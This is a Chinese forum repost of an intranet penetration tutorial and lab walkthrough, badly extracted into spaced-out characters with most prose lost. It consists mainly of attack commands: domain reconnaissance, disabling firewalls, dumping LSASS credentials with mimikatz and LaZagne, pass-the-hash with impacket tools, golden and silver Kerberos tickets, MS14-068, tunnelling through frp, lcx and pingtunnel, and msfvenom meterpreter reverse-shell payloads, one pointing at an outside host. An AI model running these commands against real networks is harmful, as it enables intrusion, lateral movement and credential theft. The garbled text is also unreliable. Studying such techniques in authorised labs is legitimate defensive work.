[26738] 2021-06-26_内网渗透技巧及靶场实践

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-19
2021-06-26_内网渗透技巧及靶场实践     m o o n s e c   2 0 2 1 - 0 6 - 2 6   #     , 2 1 1 使 1 . 1 S y s t e m i n f o ( ) N e t s t a r t   W m i c s e r v i c e   l i s t   b r i e f   T a s k l i s t W m i c s t a r t u p   g e t   c o m m a n d , c a p t i o n   S c h t a s k s / q u e r y   / f o   L I S T   / v N e t s t a t - a n o   Q u e r y u s e r   | |   q w i n s t a   线 N e t s e s s i o n   N e t s h a r e   W m i c s h a r e   g e t   n a m e , p a t h , s t a t u s   N e t u s e r   N e t u s e r   k k k k   N e t u s e r   k e n t   p a s s w o r d   / a d d N e t l o c a l g r o u p   N e t l o c a l g r o u p   / d o m a i n   N e t l o c a l g r o u p   A d m i n i s t r a t o r s   k e n t   / a d d   N e t l o c a l g r o u p   a d m i n n s t r a t o r s   n e t l o c a l g r o u p   a d m i n s t r a t o r s   / d o m a i n   W m i c u s e r a c c o u n t   g e t   / a l l   d s q u e r y u s e r   N e t u s e r   / d o m a i n   N e t u s e r   k k k k   / d o m a i n   k k k k N e t u s e r   k e n t   p a s s w o r d   / a d d   / d o m a i n N e t l o c a l g r o u p   A d m i n i s t r a t o r s   k e n t   / a d d   / d o m a i n   N e t l o c a l g r o u p   A d m i n i s t r a t o r s   / a d d   t e s t k e n t   N e t g r o u p   / d o m a i n   N e t v i e w   / d o m a i n   N e t v i e w   / d o m a i n : t e s t   N e t a c c o u n t s   / d o m a i n   N e t g r o u p   / d o m a i n   N e t g r o u p   D o m a i n   C o n t r o l l e r s   / d o m a i n   N e t g r o u p   D o m a i n   c o m p u t e r s   / d o m a i n   N e t g r o u p   D o m a i n   a d m i n s   / d o m a i n   N e t u s e r   / d o m a i n   k e n t   a c t i v e : y e s   N e t u s e r   / d o m a i n   k e n t   a c t i v e : n o     N l t e s t / D C L I S T : t e s t   W m i c u s e r a c c o u n t   g e t   / a l l   N e t g r o u p   D o m a i n   A d m i n s   / d o m a i n   n l t e s t / d o m a i n _ t r u s t s n e t c o n f i g   w o r k s t a t i o n     N e t s h f i r e w a l l   s h o w   c o n f i g   N e t s h a d v f i r e w a l l   s e t   a l l p r o f i l e s   s t a t e   o f f ( w i n d o w s s e r v e r   2 0 0 3 ) N e t s h a d v f i r e w a l l   f i r e w a l l   a d d   r u l e   n a m e = p a s s   n c   d i r = i n   a c t i o n = a l l o w p r o g r a m = C : n c . e x e   ( w i n d o w s s e r v e r   2 0 0 3 ) N e t s h a d v f i r e w a l l   f i r e w a l l   a d d   r u l e   n a m e = a l l o w   n c   d i r = o u t a c t i o n = a l l o w   p r o g r a m = C : n c . e x e 退 ( w i n d o w s s e r v e r   2 0 0 3 ) N e t s h   a d v f i r e w a l l   f i r e w a l l   a d d   r u l e   n a m e = R e m o t e   D e s k t o p p r o t o c o l = T C P   d i r = i n   l o c a l p o r t = 3 3 8 9   a c t i o n = a l l o w   3 3 8 9 ( w i n d o w s s e r v e r   2 0 0 3 ) N e t s h a d v f i r e w a l l   s e t   c u r r e n t p r o f i l e   l o g g i n g f i l e n a m e = C : w i n o d w s t e m p f w . l o g   R e g q u e r y H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n I n t e r n e t S e t t i n g s R e g q u e r y   H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l S e r v e r W i n S t a t i o n s R D P - T c p   / V   P o r t N u m b e r 3 3 8 9 ( w i n d o w s   s e r v e r   2 0 0 3 ) w m i c / n a m e s p a c e : r o o t c i m v 2 t e r m i n a l s e r v i c e s   p a t h w i n 3 2 _ t e r m i n a l s e r v i c e s e t t i n g   w h e r e   ( _ _ C L A S S   ! =   " " )   c a l l s e t a l l o w t s c o n n e c t i o n s   1 w m i c / n a m e s p a c e : r o o t c i m v 2 t e r m i n a l s e r v i c e s   p a t h   w i n 3 2 _ t s g e n e r a l s e t t i n g w h e r e   ( T e r m i n a l N a m e   = ' R D P - T c p ' )   c a l l   s e t u s e r a u t h e n t i c a t i o n r e q u i r e d   1 r e g a d d   " H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r " / v   f S i n g l e S e s s i o n P e r U s e r   / t   R E G _ D W O R D   / d   0   / f n e t s t a r t   T e r m S e r v i c e 1 . 2 S h a r p D e c r y p t P w d h t t p s : / / g i t h u b . c o m / u k n o w s e c / S h a r p D e c r y p t P w d / r a w / m a s t e r / S h a r p D e c r y p t P w d . e x e T e a m V i e w e r : S h a r p D e c r y p t P w d . e x e   - T e a m V i e w e r N a v i c a t : S h a r p D e c r y p t P w d . e x e   - N a v i c a t C r y p t o X s h e l l S h a r p D e c r y p t P w d . e x e - X m a n g a g e r   - p   S e s s i o n P a t h   - s   u s e r n a m e + s i d ( w h o a m i   / u s e r ) l a Z a g n e h t t p s : / / g i t h u b . c o m / e t h i c a l h a c k e r a g n i d h r a / L a Z a g n e / a r c h i v e / 2 . 3 . 1 . z i p 使 l a Z a g n e . e x e a l l I p c o n f i g / a l l   D N S
N e t v i e w   / d o m a i n     i p n e t t i m e   / d o m a i n n s l o o k u p p i n g i p : f o r / L   % I   i n   ( 1 , 1 , 2 5 6 )   D O   @ p i n g   - w   1   - l   1   1 9 2 . 1 6 8 . 2 0 2 . % I   |   f i n d s t r   T T L = 2 使 使 2 . 1 W i n d o w s   s e r v e r   2 0 0 8 使 使 a t 使 1 3 5 c a t W i n d o w s s e r v e r   2 0 1 2 使 s c h t a s k s 2 . 2 使 使 i m p a c k e t a t e x e c . e x e 2 . 3 i p : i p i p h a s h N e t   u s e   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8 i p c $   p a s s w o r d   / u s e r : t e s t a d m i n i s t r a t o r S c h t a s k s / c r e a t e   / s   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   / r u   S Y S T E M   / t n   e x e c u t e f i l e   / s c   D A I L Y / t r   c : / h 4 . e x e   / F S c h t a s k s / r u n   / s   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   / t n   e x e c u t e f i l e   / i S c h t a s k s / d e l e t e   / s   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   / t n   e x e c u t e f i l e   / f A t e x e c . e x e   t e s t / a d m i n i s t r a t o r : z x c v b n m 1 2 3 @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   " w h o a m i " A t e x e c . e x e   - h a s h e s   : f a c 5 d 6 6 8 0 9 9 4 0 9 c b 6 f a 2 2 3 a 3 2 e a 4 9 3 b 6   t e s t / a d m i n i s t r a t o r @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   " w h o a m i " F O R   / F   % % i   i n   ( i p s . t x t )   d o   n e t   u s e   % % i i p c $   " p a s s w o r d "   / u s e r : t e s t a d m i n i s t r a t o r F O R   / F   % % i   i n   ( p a s s . t x t )   d o   n e t   u s e   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8 i p c $   " % % i   / u s e r : t e s t a d m i n i s t r a t o r F O R   / F   % % i   i n   ( h a s h . t x t )   d o   a t e x e c . e x e   - h a s h e s   : " % % i "   t e s t / a d m i n i s t r a t o r @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   " w h o a m i "
3 h a s h w i n d o w s s e r v e r   2 0 1 2 w d i g e t w i n d o w s s e r v e r   2 0 1 2 K B 2 8 7 1 9 9 7 3 . 1 h a s h P r o c d u m p . e x e   - a c c e p t e u l a   - m a   l s a s s . e x e   l s a s s . d m p ( ) M i m i k a t z m d m p h a s h P r i v i l e g e : : d e b u g S e k u r l s a : : m i n i d u m p l s a s s . d m p S e k u r l s a : : l o g o n P a s s w o r d s f u l l h a s h c a t h a s h H a s h c a t - a   0   - m   1 0 0 0   h a s h f i l e   p a s s f i l e 3 . 2 h a s h S M B P s e x e c i p c p s e x e c P s e x e c i p c 使 h a s h P s E x e c - h a s h e s   : f a c 5 d 6 6 8 0 9 9 4 0 9 c b 6 f a 2 2 3 a 3 2 e a 4 9 3 b 6 t e s t . c o m / A d m i n i s t r a t o r @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   " w h o a m i "     ( ) 使 使 I m p a c k e t s m b e x e c p s e x e c 使 使 使 I m p a c k e t P s E x e c N e t   u s e   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8 i p c $   z x c v b n m 1 2 3   / u s e r : t e s t A d m i n i s t r a t o r P s e x e c   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   - a c c e p t e u l a   - s   c m d P s e x e c   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   - u   A d m i n i s t r a t o r   - p   z x c v b n m 1 2 3   - s   c m d
使 I m p a c k e t S m b e x e c 3 . 3   W M I W M I 1 3 5 h a s h 使 W M I C 使 c s c r i p t s h e l l C s c r i p t / / n o l o g o   w m i e x e c . v b s   / s h e l l   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   A d m i n i s t r a t o r   z x c v b n m 1 2 3 使 i m p a c k e t W m i e x e c h a s h W m i e x e c   t e s t / A d m i n i s t r a t o r : z x c v b n m 1 2 3 @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   " w h o a m i " 3 . 4 M i m i k a t z P T H P T H L M H a s h N T L M H a s h 访 N T L M H a s h 使 P s E x e c H a s h m i m i k a t z P r i v i l e g e : : d e b u g K B 2 2 8 7 1 9 9 7 P T H P t h a d m i n i s t r a t o r P t k a e s 2 5 6 3 . 5   R D P S m b e x e c   t e s t / A d m i n i s t r a t o r : z x c v b n m 1 2 3 @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8 S m b e x e c - h a s h e s   : f a c 5 d 6 6 8 0 9 9 4 0 9 c b 6 f a 2 2 3 a 3 2 e a 4 9 3 b 6 t e s t / A d m i n i s t r a t o r @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8 W m i c   / n o d e : 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   / u s e r : A d m i n i s t r a t o r   / p a s s w o r d : z x c v b n m 1 2 3 p r o c e s s   c a l l   c r e a t e   " c m d . e x e   / c   i p c o n f i g   > C : / 1 . t x t " W m i e x e c   - h a s h e s   : f a c 5 d 6 6 8 0 9 9 4 0 9 c b 6 f a 2 2 3 a 3 2 e a 4 9 3 b 6   t e s t / A d m i n i s t r a t o r @ 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   " w h o a m i " S e k u r l s a : : p t h / u s e r : A d m i n i s t r a t o r   / d o m a i n : t e s t / n t l m : f a c 5 d 6 6 8 0 9 9 4 0 9 c b 6 f a 2 2 3 a 3 2 e a 4 9 3 b 6
1 使 R D P 2 使 h a s h R D P 使 h a s h R e s t r i c t e d A d m i n   m o d e W i n d o w s s e r v e r   2 0 1 2 w i n d o w s s e r v e r   2 0 0 8 2 8 7 1 9 9 7 2 9 7 3 3 5 1 使 m i m i k a t z h a s h R D P 3 . 6   P T K ( p a s s   t h e k e y ) e k e y s a e s 2 5 6 S e k u r l s a : : e k e y s a e s 4 P T T P T T ( p a s s t h e t i c k e t ) 使 N T L M k e r b e r o s , P T H M S 1 4 - 0 6 8 ( k b 3 0 1 1 7 8 0 ) G o l d e r t i c k e t S i l v e r t i c k e t 4 . 1   使 M S 1 4 - 0 6 8 e x p w h o a m i / u s e r s i d K e r b e r o s : : p u r g e k l i s t p u r g e M S 1 4 - 0 6 8 使 m i m i k a t z W i n d o w s : M s t s c . e x e   / c o n s o l e   / v : 1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   / a d m i n L i n u x : r d e s k t o p   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8 : 3 3 8 9 R E G A D D   " H K L M S y s t e m C u r r e n t C o n t r o l S e t C o n t r o l L s a "   / v D i s a b l e R e s t r i c t e d A d m i n   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0   / f P r i v i l e g e : : d e b u g S e k u r l s a : : p t h / u s e r : A d m i n i s t r a t o r   / d o m a i n : t e s t / n t l m : f a c 5 d 6 6 8 0 9 9 4 0 9 c b 6 f a 2 2 3 a 3 2 e a 4 9 3 b 6   " / r u n : m s t s c . e x e / r e s t r i c t e d a d m i n " S e k u r l s a : : p t h / u s e r : A d m i n i s t r a t o r   / d o m a i n : t e s t 2 / a e s 2 5 6 : 6 e 0 9 8 3 1 e e 8 8 f b 8 5 c 8 a 3 f 4 a 8 8 d e a 7 0 e 2 a 1 b 1 8 1 9 7 b 7 0 d 5 7 a 9 e e b a d 7 3 b 4 5 1 3 7 4 3 3 d M S 1 4 - 0 6 8 . e x e - u   c @ t e s t . c o m   - s S - 1 - 5 - 2 1 - 2 2 7 3 1 9 1 0 6 5 - 1 6 3 5 4 8 4 3 6 0 - 3 8 8 8 4 2 1 1 7 7 - 1 1 0 5   - d   1 9 2 . 1 6 8 . 2 0 2 . 1 4 8   - p c @ z x c v b n m 1 2 3 K e r b e r o s : : p t c   " T G T _ c @ t e s t . c o m . c c a c h e "
k e k e o h a s h m i m i k a t z S e k u r l s a : : t i c k e t s / e x p o r t 使 K e r b e r o s : : p t t 4 . 2   G o l d e r   t i c k e t G o l d e r t i c k e t 使 k r b t g t h a s h T G T K D C 访 K r b t g t k r b t g t h a s h A E S 2 5 6 访 G o l d e r t i c k e t 1 k r b t g t h a s h A E S 2 5 6 2 3 S I D 4 P r i v i l e g e : : d e b u g k r b t g t h a s h   L s a d u m p : : d c s y n c / d o m a i n : t e s t . c o m   / u s e r : k r b t g t h a s h 7 1 2 0 4 2 5 8 e c 5 b 7 1 5 c 2 9 f 6 c 8 e e 4 0 a 0 c 2 0 d S I D W m i c u s e r a c c o u n t   g e t   n a m e , s i d S - 1 - 5 - 2 1 - 2 2 7 3 1 9 1 0 6 5 - 1 6 3 5 4 8 4 3 6 0 - 3 8 8 8 4 2 1 1 7 7 - 5 0 0 n e t   g r o u p   d o m a i n   a d m i n s   / d o m a i n i p c o n f i g   / a l l K e k e o   " t g t : : a s k   / u s e r : c   / d o m a i n : t e s t . c o m / n t l m : a b e 0 9 3 2 0 f 4 1 c 2 5 0 e a d c c 5 b f b a 7 7 a 5 e 1 a " k e r b e r o s : : p t t   T G T _ c @ T E S T . C O M _ k r b t g t ~ t e s t . c o m @ T E S T . C O M . k i r b i
K e r b e r o s : : p u r g e 使 k r b t g t k e r b e r o s : : p t t k r b t g t . k i r i b i   4 . 3   S i l v e r   T i c k e t S i l v e r T i c k e t T G S L D A P M S S Q L W i n R M C I F S S i l v e r T i c k e t 1 2 S I D 3 F Q D N 4 5 N T L M H a s h 6 K e r b e r o s : : p u r g e 使 m i m i k a t z S i l v e r   T i c k e t   退 m i m i k a t z 访 5 S P N S P N M S S Q L W S M A N E x c h a n g e T E R M S E R V H y p e r - V S P N S P N I P I P S S P N S e t s p n - A   c 3 / t e s t   M S S Q L k e r b e r o s : : g o l d e n / u s e r : A d m i n i s t r a t o r   / d o m a i n : t e s t . c o m / s i d : S - 1 - 5 - 2 1 - 2 2 7 3 1 9 1 0 6 5 - 1 6 3 5 4 8 4 3 6 0 - 3 8 8 8 4 2 1 1 7 7 - 5 0 0 / k r b t g t : 7 1 2 0 4 2 5 8 e c 5 b 7 1 5 c 2 9 f 6 c 8 e e 4 0 a 0 c 2 0 d   / t i c k e t : k r b t g t .   k i r i b i k e r b e r o s : : g o l d e n / u s e r : A d m i n i s t r a t o r   / d o m a i n : t e s t . c o m / s i d : S - 1 - 5 - 2 1 - 2 2 7 3 1 9 1 0 6 5 - 1 6 3 5 4 8 4 3 6 0 - 3 8 8 8 4 2 1 1 7 7 - 5 0 0 / t a r g e t : W I N - M P P G Q R 2 O W E C . t e s t . c o m   / s e r v i c e : c i f s / r c 4 : f a c 5 d 6 6 8 0 9 9 4 0 9 c b 6 f a 2 2 3 a 3 2 e a 4 9 3 b 6   / u s e r : c 3   / p t t
S P N S e t s p n - q   * / * S e t s p n - q   * / *   |   f i n d s t r   M Y S Q L K l i s t m i m i k a t z K e r b e r o s : : l i s t / e x p o r t 使 t g s r e p c r a c k . p y 6 6 . 1   I C M P I C M P 使 p i n g 访 I C M P T C P / U D P p i n g 穿 P i n g T u n n e l I C M P 使 使 w e b P i n g T u n n e l s u d o   . / p i n g t u n n e l   - t y p e   s e r v e r v p s I C M P w e b I M C P p i n g t u n n e l   - t y p e   c l i e n t   - l   : - s   I P - t   I P : - t c p   1 访 6 . 2   L c x L c x S o c k e t l i n u x p o r t m a p S o c k e t v p s 4 4 4 4 5 5 5 5 便 访 L c x . e x e   - l i s t e n   4 4 4 4   5 5 5 5 A d d - T y p e - A s s e m b l y N a m e   S y s t e m . I d e n t i t y M o d e l N e w - O b j e c t S y s t e m . I d e n t i t y M o d e l . T o k e n s . K e r b e r o s R e q u e s t o r S e c u r i t y T o k e n - A r g u m e n t L i s t   " M y S Q L / w i n 7 . x i e . c o m : 3 3 0 6 / M y S Q L " p i n g t u n n e l   - t y p e   c l i e n t   - l   : 3 3 4 4 4   - s   1 9 2 . 1 6 8 . 7 4 . 1 3 2   - t   1 9 2 . 1 6 8 . 9 6 . 1 4 5 : 8 0   - t c p   1
8 0 v p s 4 4 4 4 L c x . e x e - s l a v e   i p 4 4 4 4   I P 8 0 v p s i p 5 5 5 5 访 8 0 l c x 5 3 L c x - t r a n   5 3   I P 3 3 8 9 6 . 3   S S H H T T P D N S S S H L i n u x S S H S S H 使 S S H S S H S S H : - C - f :   - N : - g : - L : - R : - D : - P : S S H V P S w e b v p s 访 v p s S s h - C f N g   - L   V P S : I P : r o o t @ I P v p s 访 访 w e b w e b 访 v p s w e b w e b v p s 访 v p s S s h - C f N g   - R   v p s : I P : r o o t @ I P s s h s o c k s 4 / 5 s o c k s 4 / 5 访 v p s s s h   - C f N g   - D   7 0 0 0   r o o t @ I P 访 6 . 4   N g r o k 穿 穿 . / s u n n y c l i e n t i d   d 8 d 9 9 b 5 f f 5 d 4 9 9 6 访
e x e p a y l o a d e x e 6 . 5   f r p 穿 穿 7 0 0 0   . / f r p s   - c   . / f r p s . i n i f r p c : [ m s f ] t y p e =   t c p l o c a l _ i p =   i p l o c a l _ p o r t =   2 2 2 2 2     2 2 2 2 2 m s f r e m o t e _ p o r t =   6 0 0 0   6 0 0 0 . / f r p c - c   . / f r p c . i n i 6 0 0 0 M s f e x e m s f v e n o m - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p   l h o s t = i p l p o r t = i p - f   e x e   - o   h 4 . e x e e x e 线 7 7 . 1   1 使 使 n e t d i s c o v e r s u d o n e t d i s c o v e r   - i   e t h 0   - r   1 9 2 . 1 6 8 . 2 0 2 . 0 / 2 4 : - i e t h 0 - r r a n g e I P 1 9 2 . 1 6 8 . 0 . 0 / 2 4 - l f i l e n a m e r a n g e - p - t A R P - c 2 使 使 n m a p n m a p - v   - s P   1 9 2 . 1 6 8 . 2 0 2 . 0 / 2 4 - s P I C M P p i n g m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p   l h o s t = m a i 1 z h i 2 . f r e e . i d c f e n g y e . c o m l p o r t = 8 0   - f   e x e   - o   h 7 . e x e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则